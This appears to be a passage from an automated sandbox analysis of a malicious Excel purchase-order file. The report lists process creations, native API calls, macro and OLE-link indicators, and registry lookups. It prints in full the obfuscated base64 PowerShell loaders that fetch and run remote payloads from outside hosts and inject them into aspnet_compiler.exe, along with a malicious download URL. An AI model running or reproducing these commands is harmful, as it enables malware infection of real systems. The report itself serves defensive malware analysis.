Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Memory allocated: 770B0000 page execute and read and write

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0042C4A3 NtClose,	27_2_0042C4A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A707AC NtCreateMutant,LdrInitializeThunk,	27_2_00A707AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6F9F0 NtClose,LdrInitializeThunk,	27_2_00A6F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,	27_2_00A6FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,	27_2_00A6FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,	27_2_00A6FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A700C4 NtCreateFile,	27_2_00A700C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A70060 NtQuerySection,	27_2_00A70060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A70078 NtResumeThread,	27_2_00A70078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A70048 NtProtectVirtualMemory,	27_2_00A70048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A701D4 NtSetValueKey,	27_2_00A701D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7010C NtOpenDirectoryObject,	27_2_00A7010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A70C40 NtGetContextThread,	27_2_00A70C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A710D0 NtOpenProcessToken,	27_2_00A710D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A71148 NtOpenThread,	27_2_00A71148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6F8CC NtWaitForSingleObject,	27_2_00A6F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A71930 NtSetContextThread,	27_2_00A71930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6F938 NtWriteFile,	27_2_00A6F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6F900 NtReadFile,	27_2_00A6F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FAB8 NtQueryValueKey,	27_2_00A6FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FAD0 NtAllocateVirtualMemory,	27_2_00A6FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FA20 NtQueryInformationFile,	27_2_00A6FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FA50 NtEnumerateValueKey,	27_2_00A6FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FBB8 NtQueryInformationToken,	27_2_00A6FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FBE8 NtQueryVirtualMemory,	27_2_00A6FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FB50 NtCreateKey,	27_2_00A6FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FC90 NtUnmapViewOfSection,	27_2_00A6FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FC30 NtOpenProcess,	27_2_00A6FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FC60 NtMapViewOfSection,	27_2_00A6FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FC48 NtSetInformationFile,	27_2_00A6FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A71D80 NtSuspendThread,	27_2_00A71D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FD8C NtDelayExecution,	27_2_00A6FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FD5C NtEnumerateKey,	27_2_00A6FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FEA0 NtReadVirtualMemory,	27_2_00A6FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FED0 NtAdjustPrivilegesToken,	27_2_00A6FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FE24 NtWriteVirtualMemory,	27_2_00A6FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FFB4 NtCreateSection,	27_2_00A6FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FFFC NtCreateProcessEx,	27_2_00A6FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FF34 NtQueueApcThread,	27_2_00A6FF34

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE89AA34CE	8_2_000007FE89AA34CE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE89AA6FBE	8_2_000007FE89AA6FBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00401978	27_2_00401978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00403060	27_2_00403060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004011F0	27_2_004011F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0042EAF3	27_2_0042EAF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040239E	27_2_0040239E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004023A0	27_2_004023A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040FC6A	27_2_0040FC6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040FC73	27_2_0040FC73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00402C11	27_2_00402C11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416623	27_2_00416623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416622	27_2_00416622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040FE93	27_2_0040FE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040DF13	27_2_0040DF13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004027C0	27_2_004027C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004027BC	27_2_004027BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7E0C6	27_2_00A7E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7E2E9	27_2_00A7E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B263BF	27_2_00B263BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AA63DB	27_2_00AA63DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A82305	27_2_00A82305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00ACA37B	27_2_00ACA37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0443E	27_2_00B0443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B005E3	27_2_00B005E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A9C5F0	27_2_00A9C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AC6540	27_2_00AC6540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A84680	27_2_00A84680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A8E6C1	27_2_00A8E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B22622	27_2_00B22622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00ACA634	27_2_00ACA634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A8C7BC	27_2_00A8C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AA286D	27_2_00AA286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A8C85C	27_2_00A8C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A829B2	27_2_00A829B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B2098E	27_2_00B2098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B149F5	27_2_00B149F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A969FE	27_2_00A969FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00ACC920	27_2_00ACC920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B2CBA4	27_2_00B2CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B06BCB	27_2_00B06BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B22C9C	27_2_00B22C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0AC5E	27_2_00B0AC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AB0D3B	27_2_00AB0D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A8CD5B	27_2_00A8CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AB2E2F	27_2_00AB2E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A9EE4C	27_2_00A9EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B1CFB1	27_2_00B1CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AF2FDC	27_2_00AF2FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A90F3F	27_2_00A90F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AAD005	27_2_00AAD005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AFD06D	27_2_00AFD06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A83040	27_2_00A83040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A9905A	27_2_00A9905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0D13F	27_2_00B0D13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B21238	27_2_00B21238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7F3CF	27_2_00A7F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A87353	27_2_00A87353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A91489	27_2_00A91489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AB5485	27_2_00AB5485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00ABD47D	27_2_00ABD47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B235DA	27_2_00B235DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A8351F	27_2_00A8351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0579A	27_2_00B0579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AB57C3	27_2_00AB57C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B1771D	27_2_00B1771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B1F8EE	27_2_00B1F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AFF8C4	27_2_00AFF8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B05955	27_2_00B05955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0394B	27_2_00B0394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B33A83	27_2_00B33A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0DBDA	27_2_00B0DBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7FBD7	27_2_00A7FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AA7B00	27_2_00AA7B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B1FDDD	27_2_00B1FDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0BF14	27_2_00B0BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AADF7C	27_2_00AADF7C

Document contains embedded VBA macros

Source: PO#BBGR2411PO69.xls	OLE indicator, VBA macros: true
Source: 09230000.0.dr	OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: PO#BBGR2411PO69.xls	Stream path 'MBD007009DC/\x1Ole' : https://linkjago.me/RHCYXp?&damage=nasty &briefs=momentous&highlight=delicious&middleman=magenta&spankE(A+CFT5i!Y0cPBGlxDbP6MnI5*<OzfDTjcjZj9KlFjg0moZTAleAHFRL4t3bpRDluPm3zaP7HzlmDSjESavhbsM9KXzyJuhmq2bYTjtubWGqYHE98z2enDU0Y6P1shcJeXMMPegTWHieCzdEcNssRywsQR07ZfjSuSrnpZxSRuvb6NAoactyurh6FsufMg2oT66wMrco6iNu7ZSguG3eLrlSEfslw0XSJI0we6q7Zf7ksjm1ugtNf7L28dBapn5dumfkruiC4PaHeEoT0hNcZwUWtW1tn]MBRO25
Source: 09230000.0.dr	Stream path 'MBD007009DC/\x1Ole' : https://linkjago.me/RHCYXp?&damage=nasty &briefs=momentous&highlight=delicious&middleman=magenta&spankE(A+CFT5i!Y0cPBGlxDbP6MnI5*<OzfDTjcjZj9KlFjg0moZTAleAHFRL4t3bpRDluPm3zaP7HzlmDSjESavhbsM9KXzyJuhmq2bYTjtubWGqYHE98z2enDU0Y6P1shcJeXMMPegTWHieCzdEcNssRywsQR07ZfjSuSrnpZxSRuvb6NAoactyurh6FsufMg2oT66wMrco6iNu7ZSguG3eLrlSEfslw0XSJI0we6q7Zf7ksjm1ugtNf7L28dBapn5dumfkruiC4PaHeEoT0hNcZwUWtW1tn]MBRO25

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00A7E2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00A7DF5C appears 137 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00AEF970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00AC373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00AC3F92 appears 132 times

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior

Yara signature match

